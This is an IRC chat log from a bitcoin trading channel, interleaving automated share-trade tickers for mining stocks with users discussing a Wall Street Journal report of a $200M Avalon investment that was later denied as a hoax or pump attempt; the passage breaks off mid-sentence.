[ACTIVEMINING] 25 @ 0.005155 = 0.1289 BTC [+] Aug 05 14:10:32 [BTCTC] [ACTIVEMINING] 50 @ 0.005154 = 0.2577 BTC [-] Aug 05 14:10:34 [BTCTC] [ACTIVEMINING] 160 @ 0.005152 = 0.8243 BTC [-] Aug 05 14:10:35 [BTCTC] [ACTIVEMINING] 165 @ 0.00515 = 0.8498 BTC [-] Aug 05 14:11:07 [BTCTC] [BTCGARDEN] 70 @ 0.01603 = 1.1221 BTC [+] Aug 05 14:11:58 [BTCTC] [LABCOIN] 6 @ 0.001468 = 0.0088 BTC [-] Aug 05 14:12:00 labcoin sure tanked lol Aug 05 14:12:14 [BTCTC] [DMS.MINING] 62 @ 0.007861 = 0.4874 BTC [-] Aug 05 14:12:21 is the news confirmed? Aug 05 14:12:26 [BTCTC] [LABCOIN] 1 @ 0.001467 BTC [-] Aug 05 14:12:33 it looked like a hoax or mistake of another Avalon Aug 05 14:17:27 [BTCTC] [DMS.PURCHASE] 1 @ 0.02824 BTC [+] Aug 05 14:17:38 [BTCTC] [DMS.SELLING] 20 @ 0.02153 = 0.4306 BTC [+] Aug 05 14:21:55 anyone knows if issuers can remove news posts on btc-tc? Aug 05 14:22:17 made a mistake... or hope burnside will remove the bad one quickly Aug 05 14:23:50 [HAVELOCK] [SMG] 50 @ 0.0002438 = 0.0122 BTC [+] Aug 05 14:25:52 So I thought the 200 million dollar investment was fake Aug 05 14:26:19 or the news was at least Aug 05 14:27:20 [HAVELOCK] [SMG] 2 @ 0.0002438 = 0.0005 BTC [+] Aug 05 14:27:26 [HAVELOCK] [XBOND] 4 @ 0.00104997 = 0.0042 BTC [-] Aug 05 14:28:20 [BTCTC] [DMS.PURCHASE] 15 @ 0.02824 = 0.4236 BTC [+] Aug 05 14:30:15 it was in wall street journal Aug 05 14:30:25 not on a random site Aug 05 14:30:30 so i gave it a little more credence Aug 05 14:30:38 it also mentioned yifu by name Aug 05 14:30:45 so i doubt its another avalon Aug 05 14:30:55 lol it should be incredible bullish for everyone Aug 05 14:30:58 yeah Aug 05 14:31:06 i mean like price going to $200 bullish Aug 05 14:31:09 btc market cap is 500M Aug 05 14:31:14 is it? Aug 05 14:31:20 thought it was 1 billion Aug 05 14:31:21 and someone wants to come in with 200M? Aug 05 14:31:34 err right Aug 05 14:31:41 at $100 yeah Aug 05 14:31:43 at least 1 billion (number of coins X current price) Aug 05 14:31:43 [HAVELOCK] [XBOND] 5 @ 0.00104997 = 0.0052 BTC [-] Aug 05 14:31:52 still Aug 05 14:31:54 yeah Aug 05 14:31:55 i know Aug 05 14:31:57 20% Aug 05 14:32:01 is an insane number Aug 05 14:32:13 they are not gonna be running no 20nm avalons before the 28nm ones Aug 05 14:32:14 but it could be the beginning of larger players seeking to stake their claim Aug 05 14:32:22 not sure about that Aug 05 14:32:37 last time i talked to yifu, he said that gen 2 chips were already done Aug 05 14:32:41 and work was being done on gen 3 Aug 05 14:32:52 someone could just come in and buy all actm, am, labcoin shares at once Aug 05 14:33:02 well...per the article Aug 05 14:33:08 they looked at bfl, knc and others Aug 05 14:33:13 but declined to invest in those Aug 05 14:33:20 ic Aug 05 14:33:22 i think its because of the fact that avalon actually came in reasonably on time Aug 05 14:33:31 https://bitcointalk.org/index.php?topic=268081.msg2867156#msg2867156 Aug 05 14:33:39 everyone get ready to sue Avalon ($200 million possibly incoming) / rumors Aug 05 14:33:43 [MPEX] [S.MPOE] 4402 @ 0.00081514 = 3.5882 BTC [-] Aug 05 14:33:44 [MPEX] [S.MPOE] 912 @ 0.00081822 = 0.7462 BTC [+] Aug 05 14:34:04 oh? Aug 05 14:34:41 [BTCTC] [ACTIVEMINING] 50 @ 0.005236 = 0.2618 BTC [+] Aug 05 14:34:48 [BTCTC] [BTCGARDEN] 100 @ 0.01603 = 1.603 BTC [+] Aug 05 14:35:01 [BTCTC] [ACTIVEMINING] 12 @ 0.005237 = 0.0628 BTC [+] Aug 05 14:35:23 anyways, no shortage of action in these markets :p Aug 05 14:35:31 [BTCTC] [ACTIVEMINING] 8 @ 0.005264 = 0.0421 BTC [+] Aug 05 14:35:52 [BTCTC] [ACTIVEMINING] 25 @ 0.005265 = 0.1316 BTC [+] Aug 05 14:35:57 What a weekend it was too Aug 05 14:36:03 [BTCTC] [BTCGARDEN] 100 @ 0.01603 = 1.603 BTC [+] Aug 05 14:36:03 Lost so much money lol Aug 05 14:36:51 Rulother-pc_: make an IPO for 16nm ASICs. problem solved. Aug 05 14:37:30 yeah sure lol Aug 05 14:39:02 [BTCTC] [ACTIVEMINING] 10 @ 0.00526 = 0.0526 BTC [-] Aug 05 14:40:58 [BTCTC] [BTCGARDEN] 2 @ 0.01604 = 0.0321 BTC [+] Aug 05 14:41:14 [BTCTC] [CB.IDIFF-O] 64 @ 0.0079 = 0.5056 BTC Aug 05 14:42:10 so it's different avalon? http://www.xconomy.com/san-diego/2012/09/04/running-on-two-year-cycle-avalon-ventures-lands-200m-for-tenth-fund/ Aug 05 14:42:21 [BTCTC] [LABCOIN] 50 @ 0.00147 = 0.0735 BTC [+] Aug 05 14:42:22 [BTCTC] [LABCOIN] 6 @ 0.001471 = 0.0088 BTC [+] Aug 05 14:42:22 mjr_: ^ Aug 05 14:42:23 [BTCTC] [LABCOIN] 5 @ 0.001473 = 0.0074 BTC [+] Aug 05 14:42:24 [BTCTC] [LABCOIN] 1 @ 0.001492 BTC [+] Aug 05 14:44:25 first bitcoin in thailand, then this...wondering what semi-hoax will come next Aug 05 14:46:56 [BTCTC] [COGNITIVE] 2 @ 0.4401 = 0.8802 BTC [-] Aug 05 14:47:14 Can anyone recommend a side to buy prepaid virtual CC via bitcoin? Aug 05 14:47:31 [BTCTC] [CB.IDIFF-O] 10 @ 0.0079 = 0.079 BTC Aug 05 14:48:00 [HAVELOCK] [AM100] 10 @ 0.03899999 = 0.39 BTC [+] Aug 05 14:48:06 [HAVELOCK] [AM100] 8 @ 0.039 = 0.312 BTC [+] Aug 05 14:48:19 [HAVELOCK] [AM100] 3 @ 0.0399 = 0.1197 BTC [+] Aug 05 14:48:39 [BTCTC] [DMS.MINING] 55 @ 0.007861 = 0.4324 BTC [-] Aug 05 14:48:41 [HAVELOCK] [AM100] 37 @ 0.04 = 1.48 BTC [+] Aug 05 14:48:43 [BTCTC] [DMS.SELLING] 55 @ 0.0208 = 1.144 BTC [-] Aug 05 14:51:05 [BTCTC] [DMS.PURCHASE] 30 @ 0.02824 = 0.8472 BTC [+] Aug 05 14:52:51 [BTCTC] [BTCGARDEN] 3 @ 0.01604 = 0.0481 BTC [+] Aug 05 14:52:52 [BTCTC] [BTCGARDEN] 64 @ 0.01605 = 1.0272 BTC [+] Aug 05 14:52:54 [BTCTC] [BTCGARDEN] 10 @ 0.01605 = 0.1605 BTC [+] Aug 05 14:52:55 [BTCTC] [BTCGARDEN] 200 @ 0.0161 = 3.22 BTC [+] Aug 05 14:52:56 [BTCTC] [BTCGARDEN] 10 @ 0.01613 = 0.1613 BTC [+] Aug 05 14:52:57 [BTCTC] [BTCGARDEN] 90 @ 0.01613 = 1.4517 BTC [+] Aug 05 14:52:58 [BTCTC] [BTCGARDEN] 1 @ 0.01613 BTC [+] Aug 05 14:52:59 [BTCTC] [BTCGARDEN] 122 @ 0.01614 = 1.9691 BTC [+] Aug 05 14:53:02 jurov, interesting, but not a coincidence? Aug 05 14:53:21 i'm saying, the article mentioned was specifically talking about asics, and yifu Aug 05 14:53:29 someone could have duped the wall street journal Aug 05 14:53:39 but these two articles are not talking about the same thing at all Aug 05 14:53:47 [BTCTC] [ACTIVEMINING] 12 @ 0.005252 = 0.063 BTC [-] Aug 05 14:53:47 [BTCTC] [ACTIVEMINING] 50 @ 0.005253 = 0.2627 BTC [+] Aug 05 14:53:48 except they both have the word avalon in them Aug 05 14:53:49 [BTCTC] [ACTIVEMINING] 6 @ 0.005264 = 0.0316 BTC [+] Aug 05 14:53:50 [BTCTC] [ACTIVEMINING] 75 @ 0.005265 = 0.3949 BTC [+] Aug 05 14:54:01 and i told everyone, the day of the thailand news, that it was silly Aug 05 14:54:07 there was 0 news from thai officials Aug 05 14:54:13 just a post on a random dude's website Aug 05 14:54:24 so i would not give that credence Aug 05 14:54:32 until there was an official announcement Aug 05 14:55:04 definitely not place that on the same level of news as a wall street journal "rumor", which mentions details that seem to match up with what we know to be true]\ Aug 05 14:56:13 [BTCTC] [DMS.MINING] 93 @ 0.007861 = 0.7311 BTC [-] Aug 05 14:56:14 [BTCTC] [DMS.MINING] 1 @ 0.007861 BTC [-] Aug 05 14:56:16 [BTCTC] [DMS.MINING] 1 @ 0.007861 BTC [-] Aug 05 14:56:17 [BTCTC] [DMS.MINING] 24 @ 0.00786 = 0.1886 BTC [-] Aug 05 14:56:18 [BTCTC] [DMS.MINING] 1 @ 0.00771 BTC [-] Aug 05 14:56:25 [BTCTC] [LABCOIN] 200 @ 0.001452 = 0.2904 BTC [-] Aug 05 14:56:26 [BTCTC] [LABCOIN] 1 @ 0.00145 BTC [-] Aug 05 14:56:27 [BTCTC] [LABCOIN] 50 @ 0.00143 = 0.0715 BTC [-] Aug 05 14:56:28 [BTCTC] [LABCOIN] 9 @ 0.001415 = 0.0127 BTC [-] Aug 05 14:56:29 [BTCTC] [LABCOIN] 6 @ 0.001415 = 0.0085 BTC [-] Aug 05 14:56:30 [BTCTC] [LABCOIN] 75 @ 0.001414 = 0.1061 BTC [-] Aug 05 14:56:31 [BTCTC] [LABCOIN] 450 @ 0.001385 = 0.6233 BTC [-] Aug 05 14:56:32 [BTCTC] [LABCOIN] 234 @ 0.001381 = 0.3232 BTC [-] Aug 05 14:56:33 [BTCTC] [LABCOIN] 1875 @ 0.00138 = 2.5875 BTC [-] Aug 05 15:00:13 [HAVELOCK] [XBOND] [PAID] 1.00879500 BTC to 2`017`590 shares, 50 satoshi per share Aug 05 15:00:51 [HAVELOCK] [LABCO] 10 @ 0.00199999 = 0.02 BTC [-] Aug 05 15:01:53 BUT Aug 05 15:01:56 to be fair Aug 05 15:02:02 the company name is BitSynCom Aug 05 15:02:06 which they never mention Aug 05 15:02:12 AND they didn't have a quote from Yifu Aug 05 15:02:21 so it could simply be a pump attempt Aug 05 15:03:00 just saying they seem to know the details about what they are trying to pump, which is better than most attempts, and they seem to have access to a higher class of media to disseminate their info Aug 05 15:03:10 [HAVELOCK] [XBOND] 1 @ 0.00104996 BTC [-] Aug 05 15:06:10 [HAVELOCK] [LABCO] 1 @ 0.00199999 BTC [-] Aug 05 15:07:10 [BTCTC] [LABCOIN] 25 @ 0.001379 = 0.0345 BTC [-] Aug 05 15:07:11 [BTCTC] [LABCOIN] 61 @ 0.00138 = 0.0842 BTC [+] Aug 05 15:08:11 [BTCTC] [DMS.MINING] 1 @ 0.007701 BTC [-] Aug 05 15:08:12 [BTCTC] [DMS.MINING] 18 @ 0.0077 = 0.1386 BTC [-] Aug 05 15:09:12 [BTCTC] [LABCOIN] 10 @ 0.001377 = 0.0138 BTC [-] Aug 05 15:09:13 [BTCTC] [LABCOIN] 297 @ 0.001378 = 0.4093 BTC [+] Aug 05 15:09:15 [BTCTC] [LABCOIN] 93 @ 0.00138 = 0.1283 BTC [+] Aug 05 15:09:25 [BTCTC] [B.YABMC] 2 @ 0.002401 = 0.0048 BTC [+] Aug 05 15:09:27 [BTCTC] [B.YABMC] 200 @ 0.0024 = 0.48 BTC [-] Aug 05 15:09:33 [MPEX] [S.MPOE] 6900 @ 0.00081822 = 5.6457 BTC [+] Aug 05 15:10:27 [BTCTC] [COGNITIVE] 1 @ 0.43 BTC [-] Aug 05 15:10:41 [BTCTC] [COGNITIVE] 31 @ 0.4201 = 13.0231 BTC [-] Aug 05 15:12:42 [BTCTC] [COGNITIVE] 8 @ 0.42 = 3.36 BTC [-] Aug 05 15:21:40 [HAVELOCK] [SMG] 48 @ 0.0002438 = 0.0117 BTC [+] Aug 05 15:21:51 [BTCTC] [ASICMINER-PT] 1 @ 4 BTC [-] Aug 05 15:22:01 [HAVELOCK] [LABCO] 4 @ 0.00199999 = 0.008 BTC [-] Aug 05 15:22:21 [BTCTC] [ASICMINER-PT] 6 @ 4 = 24 BTC [-] Aug 05 15:24:27 so cointerra.. http://www.cointerra.com/team/ ceo updated his linkedin profile Aug 05 15:26:40 [BTCTC] [BTCGARDEN] 302 @ 0.01614 = 4.8743 BTC [+] Aug 05 15:28:18 [BTCTC] [DMS.PURCHASE] 20 @ 0.02824 = 0.5648 BTC [+] Aug 05 15:32:17 [BTCTC] [ACTIVEMINING] 50 @ 0.00528 = 0.264 BTC [+] Aug 05 15:33:35 [BTCTC] [CB.IDIFF-O] 10 @ 0.0079 = 0.079 BTC Aug 05 15:37:05 [HAVELOCK] [XBOND] 1 @ 0.00104996 BTC [-] Aug 05 15:38:29 [BTCTC] [DMS.SELLING] 8 @ 0.02149 = 0.1719 BTC [+] Aug 05 15:38:47 [BTCTC] [LTC-ATF.B2] 1 @ 0.01041 BTC [-] Aug 05 15:39:29 [BTCTC] [BTCGARDEN] 360 @ 0.01614 = 5.8104 BTC [+] Aug 05 15:40:49 [BTCTC] [ACTIVEMINING] 1 @ 0.005216 BTC [-] Aug 05 15:41:37 [BTCTC] [LABCOIN] 93 @ 0.0014 = 0.1302 BTC [+] Aug 05 15:43:00 [BTCTC] [CB.IDIFF-O] 1 @ 0.0079 BTC Aug 05 15:43:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.03914 BTC [-] Aug 05 15:44:11 [BTCTC] [ASICMINER-PT] 7 @ 4 = 28 BTC [-] Aug 05 15:46:08 [BTCTC] [DMS.MINING] 14 @ 0.0076 = 0.1064 BTC [-] Aug 05 15:46:20 CNBC says joe lewis is denying the report about avalon Aug 05 15:46:26 [BTCTC] [ASICMINER-PT] 1 @ 4 BTC [-] Aug 05 15:47:26 [BTCTC] [DMS.SELLING] 14 @ 0.02081 = 0.2913 BTC [-] Aug 05 15:47:49 i find it pretty hard to believe Aug 05 15:48:26 $200M investment in any bitcoin related company? Or the denial? :) Aug 05 15:48:49 $200m into mining, to Avalon Aug 05 15:48:57 yeah, same here. Aug 05 15:49:00 Just flashed on the screen he is doing nothing with Avalon Aug 05 15:49:20 crazy the wsj got taken for a ride on this one Aug 05 15:49:50 haha Aug 05 15:49:52 [BTCTC] [LABCOIN] 10 @ 0.001411 = 0.0141 BTC [+] Aug 05 15:50:13 meanwhile AM farm has been climbing the past few days, 53.44TH 3-day avg now Aug 05 15:50:15 all media are stupid pieces of garbage these days Aug 05 15:50:28 [BTCTC] [DMS.PURCHASE] 1000 @ 0.02824 = 28.24 BTC [+] Aug 05 15:51:10 Link to confirm? Aug 05 15:51:21 No link its on TV Aug 05 15:51:31 LINK ME TO YOUR TB! Aug 05 15:51:33 TV TOO Aug 05 15:51:39 ALL THE LINKS Aug 05 15:51:49 Theyll tweet it or some shit soon Aug 05 15:52:20 What channel? Aug 05 15:52:29 Which news outlet? Aug 05 15:52:50 CNBC Aug 05 15:52:55 [HAVELOCK] [AM1] 1 @ 4.03 BTC [-] Aug 05 15:52:57 [HAVELOCK] [AM1] 1 @ 4.02 BTC [-] Aug 05 15:52:59 Its a commercial now Aug 05 15:55:04 [BTCTC] [DMS.PURCHASE] 2500 @ 0.02824 = 70.6 BTC [+] Aug 05 15:55:51 [BTCTC] [BASIC-MINING] 1 @ 0.41 BTC [+] Aug 05 15:56:00 [BTCTC] [BASIC-MINING] 2 @ 0.42 = 0.84 BTC [+] Aug 05 15:56:02 [BTCTC] [BASIC-MINING] 1 @ 0.4222 BTC [+] Aug 05 15:56:36 [MPEX] [S.MPOE] 4488 @ 0.00081822 = 3.6722 BTC [+] Aug 05 15:56:38 [MPEX] [S.MPOE] 4062 @ 0.00081948 = 3.3287 BTC [+] Aug 05 15:57:04 [BTCTC] [DMS.MINING] 180 @ 0.00755 = 1.359 BTC [-] Aug 05 15:57:06 [BTCTC] [DMS.MINING] 1000 @ 0.007551 = 7.551 BTC [+] Aug 05 15:57:07 [BTCTC] [DMS.MINING] 727 @ 0.007513 = 5.462 BTC [-] Aug 05 15:58:09 [BTCTC] [DMS.PURCHASE] 200 @ 0.02824 = 5.648 BTC [+] Aug 05 16:01:40 [BTCTC] [DMS.PURCHASE] 23 @ 0.02824 = 0.6495 BTC [+] Aug 05 16:02:15 Scott Wapner ‏@ScottWapnerCNBC 1m Investor Joe Lewis tells me the story alleging his Bitcoin-related investment is 'completely untrue'. Aug 05 16:02:45 Yea Aug 05 16:03:14 Good now the markets can start to recover ffs Aug 05 16:03:30 wwhaaat Aug 05 16:03:35 but they said it on wsj! Aug 05 16:03:35 [BTCTC] [DMS.PURCHASE] 200 @ 0.02824 = 5.648 BTC [+] Aug 05 16:03:40 i cant believe this! Aug 05 16:04:16 how's it possible that they didn't factcheck this? Aug 05 16:04:19 I'll write this up on my list on reasons not to read the paper and believe the mms Aug 05 16:04:24 msm* Aug 05 16:06:00 LOL Aug 05 16:06:25 I was half lol'ing last night and half appalled at the ridiculous reaction people had to that article. Aug 05 16:06:48 [BTCTC] [BTCGARDEN] 1 @ 0.01614 BTC [+] Aug 05 16:07:50 [BTCTC] [ACTIVEMINING] 25 @ 0.005284 = 0.1321 BTC [+] Aug 05 16:07:52 [BTCTC] [ACTIVEMINING] 2 @ 0.005285 = 0.0106 BTC [+] Aug 05 16:07:53 [BTCTC] [ACTIVEMINING] 12 @ 0.005299 = 0.0636 BTC [+] Aug 05 16:07:54 [BTCTC] [ACTIVEMINING] 100 @ 0.0053 = 0.53 BTC [+] Aug 05 16:08:08 [HAVELOCK] [XBOND] 1 @ 0.00104996 BTC [-] Aug 05 16:09:42 [BTCTC] [LABCOIN] 15 @ 0.00143 = 0.0215 BTC [+] Aug 05 16:10:25 [BTCTC] [LABCOIN] 235 @ 0.001407 = 0.3306 BTC [-] Aug 05 16:10:26 [BTCTC] [LABCOIN] 50 @ 0.001408 = 0.0704 BTC [+] Aug 05 16:10:28 [BTCTC] [LABCOIN] 2592 @ 0.001399 = 3.6262 BTC [-] Aug 05 16:11:28 dexx, how much did you sell? Aug 05 16:12:06 [BTCTC] [CB.IDIFF-O] 600 @ 0.0079 = 4.74 BTC Aug 05 16:12:19 [BTCTC] [DMS.MINING] 199 @ 0.00737 = 1.4666 BTC [-] Aug 05 16:12:22 [BTCTC] [DMS.MINING] 158 @ 0.007369 = 1.1643 BTC [-] Aug 05 16:12:24 [BTCTC] [DMS.MINING] 2 @ 0.00735 = 0.0147 BTC [-] Aug 05 16:12:25 [BTCTC] [DMS.MINING] 2 @ 0.007222 = 0.0144 BTC [-] Aug 05 16:12:27 [BTCTC] [DMS.MINING] 10 @ 0.007221 = 0.0722 BTC [-] Aug 05 16:12:28 [BTCTC] [DMS.MINING] 1000 @ 0.007215 = 7.215 BTC [-] Aug 05 16:12:29 [BTCTC] [DMS.MINING] 6 @ 0.007153 = 0.0429 BTC [-] Aug 05 16:12:30 [BTCTC] [DMS.MINING] 30 @ 0.007153 = 0.2146 BTC [-] Aug 05 16:12:45 sadly nothing Aug 05 16:12:45 "Scott Wapner ‏@ScottWapnerCNBC 1m Aug 05 16:12:45 [16:03:22] Investor Joe Lewis tells me the story alleging his Bitcoin-related investment is 'completely untrue'." Aug 05 16:12:47 [HAVELOCK] [XBOND] 147 @ 0.00104996 = 0.1543 BTC [-] Aug 05 16:14:49 [BTCTC] [CB.IDIFF-O] 3000 @ 0.0079 = 23.7 BTC Aug 05 16:15:45 and you, kleeck? ;) Aug 05 16:16:07 [BTCTC] [LABCOIN] 13 @ 0.001421 = 0.0185 BTC [+] Aug 05 16:16:24 [BTCTC] [LABCOIN] 3 @ 0.001419 = 0.0043 BTC [-] Aug 05 16:16:29 I did manage to double up on some stocks Aug 05 16:16:52 [BTCTC] [ACTIVEMINING] 10 @ 0.005439 = 0.0544 BTC [+] Aug 05 16:16:57 [BTCTC] [ACTIVEMINING] 68 @ 0.00544 = 0.3699 BTC [+] Aug 05 16:16:58 [BTCTC] [ACTIVEMINING] 17 @ 0.005441 = 0.0925 BTC [+] Aug 05 16:17:24 nice Aug 05 16:17:34 [BTCTC] [COGNITIVE] 1 @ 0.386 BTC [-] Aug 05 16:17:45 [BTCTC] [ACTIVEMINING] 12 @ 0.005456 = 0.0655 BTC [+] Aug 05 16:17:46 [BTCTC] [ACTIVEMINING] 50 @ 0.005457 = 0.2729 BTC [+] Aug 05 16:17:57 [BTCTC] [COGNITIVE] 1 @ 0.386 BTC [-] Aug 05 16:18:11 [BTCTC] [COGNITIVE] 1 @ 0.385 BTC [-] Aug 05 16:18:19 [HAVELOCK] [XBOND] 243 @ 0.00104996 = 0.2551 BTC [-] Aug 05 16:18:26 [BTCTC] [COGNITIVE] 1 @ 0.384 BTC [-] Aug 05 16:18:41 [BTCTC] [ACTIVEMINING] 25 @ 0.005469 = 0.1367 BTC [+] Aug 05 16:18:55 [BTCTC] [COGNITIVE] 1 @ 0.383 BTC [-] Aug 05 16:18:57 [BTCTC] [DMS.MINING] 10 @ 0.007369 = 0.0737 BTC [+] Aug 05 16:19:09 [BTCTC] [COGNITIVE] 1 @ 0.382 BTC [-] Aug 05 16:19:22 [BTCTC] [ACTIVEMINING] 100 @ 0.00547 = 0.547 BTC [+] Aug 05 16:19:25 [BTCTC] [COGNITIVE] 1 @ 0.381 BTC [-] Aug 05 16:19:40 [BTCTC] [COGNITIVE] 1 @ 0.38 BTC [-] Aug 05 16:20:31 [BTCTC] [ACTIVEMINING] 15 @ 0.005507 = 0.0826 BTC [+] Aug 05 16:20:49 [BTCTC] [COGNITIVE] 1 @ 0.3772 BTC [-] Aug 05 16:20:58 [BTCTC] [ACTIVEMINING] 60 @ 0.005508 = 0.3305 BTC [+] Aug 05 16:21:46 [BTCTC] [ACTIVEMINING] 68 @ 0.005605 = 0.3811 BTC [+] Aug 05 16:21:49 [BTCTC] [ACTIVEMINING] 50 @ 0.005606 = 0.2803 BTC [+] Aug 05 16:21:50 [BTCTC] [ACTIVEMINING] 50 @ 0.005607 = 0.2804 BTC [+] Aug 05 16:21:52 [BTCTC] [ACTIVEMINING] 50 @ 0.005608 = 0.2804 BTC [+] Aug 05 16:21:53 [BTCTC] [ACTIVEMINING] 100 @ 0.00561 = 0.561 BTC [+] Aug 05 16:21:54 [BTCTC] [ACTIVEMINING] 428 @ 0.005611 = 2.4015 BTC [+] Aug 05 16:21:55 [BTCTC] [ACTIVEMINING] 22 @ 0.005612 = 0.1235 BTC [+] Aug 05 16:23:11 [BTCTC] [ACTIVEMINING] 300 @ 0.005612 = 1.6836 BTC [+] Aug 05 16:23:33 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [-] Aug 05 16:23:34 [BTCTC] [BTCGARDEN] 4 @ 0.016 = 0.064 BTC [-] Aug 05 16:23:36 [BTCTC] [BTCGARDEN] 2 @ 0.01599 = 0.032 BTC [-] Aug 05 16:23:37 [BTCTC] [BTCGARDEN] 50 @ 0.01599 = 0.7995 BTC [-] Aug 05 16:23:37 [BTCTC] [BTCGARDEN] 23 @ 0.01598 = 0.3675 BTC [-] Aug 05 16:23:45 [BTCTC] [ACTIVEMINING] 1392 @ 0.005612 = 7.8119 BTC [+] Aug 05 16:23:46 https://bitcointalk.org/index.php?topic=252531.msg2870639#msg2870639 Aug 05 16:23:48 [BTCTC] [ACTIVEMINING] 90 @ 0.005617 = 0.5055 BTC [+] Aug 05 16:23:56 [ActiveMining] The Official Active Mining Discussion Thread Aug 05 16:24:23 [BTCTC] [ACTIVEMINING] 150 @ 0.005618 = 0.8427 BTC [+] Aug 05 16:24:26 [BTCTC] [ACTIVEMINING] 170 @ 0.005618 = 0.9551 BTC [+] Aug 05 16:24:29 [BTCTC] [ACTIVEMINING] 3 @ 0.005612 = 0.0168 BTC [-] Aug 05 16:25:10 [BTCTC] [ACTIVEMINING] 30 @ 0.00561 = 0.1683 BTC [-] Aug 05 16:25:49 [BTCTC] [ACTIVEMINING] 38 @ 0.005609 = 0.2131 BTC [-] Aug 05 16:25:53 [BTCTC] [LABCOIN] 70 @ 0.001421 = 0.0995 BTC [+] Aug 05 16:26:13 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.002625 = 0.0131 BTC [+] Aug 05 16:26:21 [BTCTC] [ACTIVEMINING] 1 @ 0.005618 BTC [+] Aug 05 16:28:49 [BTCTC] [DMS.SELLING] 1 @ 0.02143 BTC [+] Aug 05 16:28:50 [BTCTC] [LABCOIN] 2 @ 0.001433 = 0.0029 BTC [+] Aug 05 16:28:52 [BTCTC] [LABCOIN] 1 @ 0.001466 BTC [+] Aug 05 16:28:53 [BTCTC] [LABCOIN] 34 @ 0.001484 = 0.0505 BTC [+] Aug 05 16:31:50 [BTCTC] [ACTIVEMINING] 75 @ 0.005618 = 0.4214 BTC [+] Aug 05 16:35:11 [BTCTC] [BTCGARDEN] 1 @ 0.01599 BTC [+] Aug 05 16:35:12 [BTCTC] [BTCGARDEN] 118 @ 0.01598 = 1.8856 BTC [-] Aug 05 16:35:14 [BTCTC] [BTCGARDEN] 150 @ 0.01598 = 2.397 BTC [-] Aug 05 16:38:58 [BTCTC] [LABCOIN] 25 @ 0.001484 = 0.0371 BTC [+] Aug 05 16:38:59 [BTCTC] [LABCOIN] 252 @ 0.001485 = 0.3742 BTC [+] Aug 05 16:39:07 [BTCTC] [LABCOIN] 25 @ 0.001485 = 0.0371 BTC [+] Aug 05 16:40:13 [BTCTC] [DMS.SELLING] 1 @ 0.02143 BTC [+] Aug 05 16:41:53 [BTCTC] [LTC-ATF.B2] 9 @ 0.01041 = 0.0937 BTC [-] Aug 05 16:43:03 [BTCTC] [ACTIVEMINING] 14 @ 0.005617 = 0.0786 BTC [-] Aug 05 16:43:59 [BTCTC] [DMS.MINING] 1 @ 0.0076 BTC [+] Aug 05 16:44:11 [BTCTC] [TAT.MINIGAME] 1 @ 0.000242 BTC [+] Aug 05 16:45:17 [BTCTC] [ACTIVEMINING] 36 @ 0.005617 = 0.2022 BTC [-] Aug 05 16:45:20 [BTCTC] [ACTIVEMINING] 270 @ 0.005618 = 1.5169 BTC [+] Aug 05 16:45:27 [BTCTC] [BTCGARDEN] 5 @ 0.01608 = 0.0804 BTC [+] Aug 05 16:45:52 [BTCTC] [COGNITIVE] 5 @ 0.4 = 2 BTC [+] Aug 05 16:46:12 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.002624 = 0.0079 BTC [-] Aug 05 16:46:21 [BTCTC] [COGNITIVE] 1 @ 0.4 BTC [+] Aug 05 16:47:31 [BTCTC] [BTCGARDEN] 23 @ 0.01608 = 0.3698 BTC [+] Aug 05 16:47:33 [BTCTC] [BTCGARDEN] 153 @ 0.01609 = 2.4618 BTC [+] Aug 05 16:48:03 [BTCTC] [DMS.SELLING] 8 @ 0.02143 = 0.1714 BTC [+] Aug 05 16:48:05 [BTCTC] [DMS.SELLING] 29 @ 0.02153 = 0.6244 BTC [+] Aug 05 16:48:05 [BTCTC] [DMS.SELLING] 13 @ 0.02154 = 0.28 BTC [+] Aug 05 16:50:25 so, the Joe Lewis article is fake correct? Aug 05 16:50:29 Yes Aug 05 16:50:38 k, thanks Aug 05 16:50:40 CNBC spoke to him and he said he had no knowledge of Phoenix Aug 05 16:50:50 https://twitter.com/ScottWapnerCNBC/statuses/364370798892421120 Aug 05 16:50:51 [BTCTC] [DMS.MINING] 1 @ 0.007789 BTC [+] Aug 05 16:50:56 Twitter / ScottWapnerCNBC: Spoke to Joe Lewis this morning ... Aug 05 16:51:30 [BTCTC] [DMS.MINING] 1 @ 0.007789 BTC [+] Aug 05 16:51:42 [BTCTC] [LABCOIN] 10 @ 0.001479 = 0.0148 BTC [-] Aug 05 16:51:43 [BTCTC] [LABCOIN] 235 @ 0.00148 = 0.3478 BTC [+] Aug 05 16:51:45 [BTCTC] [LABCOIN] 1 @ 0.001488 BTC [+] Aug 05 16:51:46 [BTCTC] [LABCOIN] 2000 @ 0.0015 = 3 BTC [+] Aug 05 16:51:47 [BTCTC] [LABCOIN] 125 @ 0.001536 = 0.192 BTC [+] Aug 05 16:51:48 [BTCTC] [LABCOIN] 1000 @ 0.001537 = 1.537 BTC [+] Aug 05 16:51:49 [BTCTC] [LABCOIN] 1 @ 0.001541 BTC [+] Aug 05 16:51:50 [BTCTC] [LABCOIN] 125 @ 0.001549 = 0.1936 BTC [+] Aug 05 16:51:50 [BTCTC] [LABCOIN] 1000 @ 0.00155 = 1.55 BTC [+] Aug 05 16:51:51 [BTCTC] [LABCOIN] 12 @ 0.001564 = 0.0188 BTC [+] Aug 05 16:51:52 [BTCTC] [LABCOIN] 100 @ 0.001565 = 0.1565 BTC [+] Aug 05 16:51:54 [BTCTC] [LABCOIN] 481 @ 0.001567 = 0.7537 BTC [+] Aug 05 16:51:55 [BTCTC] [LABCOIN] 3850 @ 0.001568 = 6.0368 BTC [+] Aug 05 16:51:56 [BTCTC] [LABCOIN] 250 @ 0.001573 = 0.3933 BTC [+] Aug 05 16:51:57 [BTCTC] [LABCOIN] 2000 @ 0.001574 = 3.148 BTC [+] Aug 05 16:51:58 [BTCTC] [LABCOIN] 197 @ 0.001591 = 0.3134 BTC [+] Aug 05 16:51:59 [BTCTC] [LABCOIN] 2000 @ 0.001592 = 3.184 BTC [+] Aug 05 16:52:38 Reinvesting at .0011 doesn't hurt after all Aug 05 16:52:39 [BTCTC] [DMS.MINING] 2 @ 0.007789 = 0.0156 BTC [+] Aug 05 16:53:35 [BTCTC] [LABCOIN] 235 @ 0.001593 = 0.3744 BTC [+] Aug 05 16:54:05 [BTCTC] [LABCOIN] 2000 @ 0.001594 = 3.188 BTC [+] Aug 05 16:54:35 so that was completely false Aug 05 16:54:40 Yes Aug 05 16:54:40 some pumper Aug 05 16:55:13 i don't think the 